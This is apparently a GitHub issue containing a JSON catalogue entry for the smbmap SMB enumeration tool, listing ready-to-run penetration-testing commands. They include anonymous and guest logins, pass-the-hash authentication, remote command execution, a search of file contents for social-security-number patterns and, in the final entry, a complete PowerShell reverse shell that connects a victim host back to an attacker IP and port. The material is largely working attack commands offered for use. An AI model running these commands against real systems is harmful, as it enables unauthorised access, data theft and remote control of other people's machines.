Closed Patrick-DE closed 1 year ago
{ "name": "smbmap", "phases": [ "02. Reconnaissance" ], "category": "", "stealthy": false, "platforms": [ "Linux" ], "source": "https://github.com/ShawnDEvans/smbmap", "description": "SMBMap allows users to enumerate samba share drives across an entire domain. List share drives, drive permissions, share contents, upload/download functionality, file name auto-download pattern matching, and even execute remote commands. This tool was designed with pen testing in mind, and is intended to simplify searching for potentially sensitive data across large networks.", "undetected": [], "detected": [], "content": "\n## [[Guest Access (SMB)]]\n* `smbmap -u \"\" -p \"\" -P 445 -H <dc-ip>`\n* `smbmap -u \"guest\" -p \"\" -P 445 -H <dc-ip>`\n\n\n", "commands": [ { "id": "f6451a5f-08ea-4bc7-a018-f9bc38fbf921", "name": "SMB anonymous login", "description": "", "tag": "", "results": [], "cmd": "smbmap -u \"\" -p \"\" -P 445 -H <ip>", "requirements": { "tag": "SERVICE:SMB" } }, { "id": "7305314c-e31c-42f1-af86-c4d13e06c0e8", "name": "SMB guest login", "description": "", "tag": "", "results": [], "cmd": "smbmap -u \"guest\" -p \"\" -P 445 -H <ip>", "requirements": { "tag": "SERVICE:SMB" } }, { "id": "338a4da8-b77c-4e08-ba5b-e11383d25df7", "name": "Help", "description": "", "tag": "", "results": [], "cmd": "Main arguments:\n -H HOST IP of host\n --host-file FILE File containing a list of hosts\n -u USERNAME Username, if omitted null session assumed\n -p PASSWORD Password or NTLM hash\n --prompt Prompt for a password\n -s SHARE Specify a share (default C$), ex 'C$'\n -d DOMAIN Domain name (default WORKGROUP)\n -P PORT SMB port (default 445)\n -v Return the OS version of the remote host\n --admin Just report if the user is an admin\n --no-banner Removes the banner from the top of the output\n --no-color Removes color from output\n --no-update Removes \"Working on it...\" update message from output\n\nCommand Execution:\n Options for executing commands on the specified host\n\n -x COMMAND Execute a command ex. 'ipconfig /all'\n --mode CMDMODE Set the execution method, wmi or psexec, default wmi\n\nShard drive Search:\n Options for searching/enumerating the share of the specified host(s)\n\n -L List all drives on the specified host, requires ADMIN\n rights.\n -R [PATH] Recursively list dirs, and files (no share\\path lists\n ALL shares), ex. 'C$\\Finance'\n -r [PATH] List contents of directory, default is to list root of\n all shares, ex. -r 'C$\\Documents and\n Settings\\Administrator\\Documents'\n -A PATTERN Define a file name pattern (regex) that auto downloads\n a file on a match (requires -R or -r), not case\n sensitive, ex '(web|global).(asax|config)'\n -g FILE Output to a file in a grep friendly format, used with\n -r or -R (otherwise it outputs nothing), ex -g\n grep_out.txt\n --csv FILE Output to a CSV file, ex --csv shares.csv\n --dir-only List only directories, ommit files.\n --no-write-check Skip check to see if drive grants WRITE access.\n -q Quiet verbose output. Only shows shares you have READ\n or WRITE on, and suppresses file listing when\n performing a search (-A).\n --depth DEPTH Traverse a directory tree to a specific depth. Default\n is 5.\n --exclude SHARE [SHARE ...]\n Exclude share(s) from searching and listing, ex.\n --exclude ADMIN$ C$'\n\nFile Content Search:\n Options for searching the content of files (must run as root), kind of experimental\n\n -F PATTERN File content search, -F '[Pp]assword' (requires admin\n access to execute commands, and PowerShell on victim\n host)\n --search-path PATH Specify drive/path to search (used with -F, default\n C:\\Users), ex 'D:\\HR\\'\n --search-timeout TIMEOUT\n Specifcy a timeout (in seconds) before the file search\n job gets killed. Default is 300 seconds.\n\nFilesystem interaction:\n Options for interacting with the specified host's filesystem\n\n --download PATH Download a file from the remote system,\n ex.'C$\\temp\\passwords.txt'\n --upload SRC DST Upload a file to the remote system ex.\n '/tmp/payload.exe C$\\temp\\payload.exe'\n --delete PATH TO FILE\n Delete a remote file, ex. 'C$\\temp\\msf.exe'\n --skip Skip delete file confirmation prompt", "requirements": { "tag": "SERVICE:SMB" } }, { "id": "d8562afa-f263-41df-a14d-c5c2658c8aff", "name": "SMB login with hash", "description": "", "tag": "", "results": [], "cmd": "smbmap.py -u jsmith -p 'aad3b435b51404eeaad3b435b51404ee:da76f2c4c96028b7a6111aef4a50a94d' -H 172.16.0.20", "requirements": { "tag": "SERVICE:SMB" } }, { "id": "3333793b-2086-4f3b-abc1-6f1d82c71dee", "name": "SMB command exec", "description": "", "tag": "", "results": [ "EXECUTION:REMOTE" ], "cmd": "smbmap.py -u ariley -p 'P@$$w0rd1234!' -d ABC -x 'net group \"Domain Admins\" /domain' -H 192.168.2.50", "requirements": { "tag": "SERVICE:SMB" } }, { "id": "dc866f27-609b-47cc-8ea8-9642e71a0f25", "name": "SMB login", "description": "", "tag": "", "results": [], "cmd": "smbmap.py -H 192.168.12.123 -u administrator -p asdf1234", "requirements": { "tag": "SERVICE:SMB" } }, { "id": "f1218659-f058-4d69-8c44-23a6248fad82", "name": "Non recursive path listing (ls)", "description": "", "tag": "", "results": [], "cmd": "smbmap.py -H 172.16.0.24 -u Administrator -p 'changeMe' -r 'C$\\Users'", "requirements": { "tag": "SERVICE:SMB" } }, { "id": "b4c2ff7c-d57a-4e5b-bea5-bbd17cc18e17", "name": "File Content Search", "description": "", "tag": "", "results": [], "cmd": "smbmap.py --host-file ~/Desktop/smb-workstation-sml.txt -u NopSec -p 'NopSec1234!' -d widgetworld -F '[1-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9][0-9][0-9]'", "requirements": { "tag": "SERVICE:SMB" } }, { "id": "6ebdf996-1109-46b2-a4b2-5f50523d2242", "name": "Get drives", "description": "", "tag": "", "results": [ "COMPUTER:DRIVES" ], "cmd": "smbmap.py -H 192.168.1.24 -u Administrator -p 'R33nisP!nckle' -L", "requirements": { "tag": "SERVICE:SMB" } }, { "id": "349d8da8-632a-4060-bb81-2814f0c3db0b", "name": "Get Shell (PS)", "description": "Run Powershell Script on Victim SMB host (change the IP in the code to your IP addres, i.e where the shell connects back to)", "tag": "", "results": [ "EXECUTION:REMOTE" ], "cmd": "python smbmap.py -u jsmith -p 'R33nisP!nckle' -d ABC -H 192.168.2.50 -x 'powershell -command \"function ReverseShellClean {if ($c.Connected -eq $true) {$c.Close()}; if ($p.ExitCode -ne $null) {$p.Close()}; exit; };$a=\"\"\"\"192.168.0.153\"\"\"\"; $port=\"\"\"\"4445\"\"\"\";$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$port) ;$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize ;$p=New-Object System.Diagnostics.Process ;$p.StartInfo.FileName=\"\"\"\"cmd.exe\"\"\"\" ;$p.StartInfo.RedirectStandardInput=1 ;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0 ;$p.Start() ;$is=$p.StandardInput ;$os=$p.StandardOutput ;Start-Sleep 1 ;$e=new-object System.Text.AsciiEncoding ;while($os.Peek() -ne -1){$out += $e.GetString($os.Read())} $s.Write($e.GetBytes($out),0,$out.Length) ;$out=$null;$done=$false;while (-not $done) {if ($c.Connected -ne $true) {cleanup} $pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) { $read=$s.Read($nb,$pos,$nb.Length - $pos); $pos+=$read;if ($pos -and ($nb[0..$($pos-1)] -contains 10)) {break}} if ($pos -gt 0){ $string=$e.GetString($nb,0,$pos); $is.write($string); start-sleep 1; if ($p.ExitCode -ne $null) {ReverseShellClean} else { $out=$e.GetString($os.Read());while($os.Peek() -ne -1){ $out += $e.GetString($os.Read());if ($out -eq $string) {$out=\"\"\"\" \"\"\"\"}} $s.Write($e.GetBytes($out),0,$out.length); $out=$null; $string=$null}} else {ReverseShellClean}};\"'", "requirements": { "tag": "SERVICE:SMB" } } ] }
Patrick-DE
commented
1 year ago Patrick-DE
commented
1 year ago